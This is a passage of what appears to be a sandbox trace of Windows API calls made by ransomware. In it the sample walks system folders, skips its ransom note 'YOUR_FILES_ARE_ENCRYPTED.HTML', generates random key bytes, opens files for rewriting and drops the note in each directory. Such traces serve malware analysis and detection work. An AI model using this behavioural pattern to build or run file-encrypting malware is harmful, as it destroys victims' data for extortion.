out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fa373b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafec2e40, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0169.919] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.919] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0169.919] lstrlenW (lpString=".sdf") returned 4 [0169.919] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0169.919] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe85b20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.919] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe85b20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.920] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 
returned 0xffffffff [0169.920] GetProcessHeap () returned 0x270000 [0169.921] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.921] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0169.921] GetProcessHeap () returned 0x270000 [0169.921] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.921] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData" [0169.921] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*" [0169.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.921] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: 
lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.921] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5747b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x7f5747b0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0169.921] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.921] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0169.921] lstrlenW (lpString=".sdf") returned 4 [0169.921] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0169.922] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.922] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e59a53, ftCreationTime.dwHighDateTime=0x1cb88f6, 
ftLastAccessTime.dwLowDateTime=0x3e59a53, ftLastAccessTime.dwHighDateTime=0x1cb88f6, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0169.922] lstrcmpW (lpString1="RacMetaData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.922] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0169.922] lstrlenW (lpString=".dat") returned 4 [0169.922] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0169.922] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.922] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xcbeabc80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478", cAlternateFileName="RACWMI~1.07A")) returned 1 [0169.922] lstrcmpW (lpString1="RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.922] PathFindExtensionW 
(pszPath="RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478") returned=".07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478" [0169.923] lstrlenW (lpString=".07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478") returned 65 [0169.923] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0169.923] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.923] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0169.923] lstrlenW (lpString=".dat") returned 4 [0169.923] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0169.923] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.923] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.923] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.923] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.923] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.924] GetProcessHeap () returned 0x270000 [0169.925] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.925] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) 
returned 1 [0169.925] GetProcessHeap () returned 0x270000 [0169.925] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.925] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp" [0169.925] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*" [0169.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.925] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.925] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ad860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab6ad860, 
ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab6f9b20, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql5130.tmp", cAlternateFileName="")) returned 1 [0169.925] lstrcmpW (lpString1="sql5130.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.925] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0169.925] lstrlenW (lpString=".tmp") returned 4 [0169.925] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0169.925] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab76bf40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql517F.tmp", cAlternateFileName="")) returned 1 [0169.925] lstrcmpW (lpString1="sql517F.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.926] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0169.926] lstrlenW (lpString=".tmp") returned 4 [0169.926] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0169.926] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.926] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.926] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.926] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.926] GetProcessHeap () returned 0x270000 [0169.927] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.927] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.927] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.955] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.955] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.955] GetProcessHeap () returned 0x270000 [0169.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.956] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Search", cAlternateFileName="")) returned 1 [0169.956] GetProcessHeap () returned 0x270000 [0169.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.956] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" [0169.956] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*" [0169.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.957] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.957] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Data", cAlternateFileName="")) returned 1 [0169.957] GetProcessHeap () returned 0x270000 [0169.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.957] lstrcpyW (in: lpString1=0x73e0048, 
lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" [0169.957] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*" [0169.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, 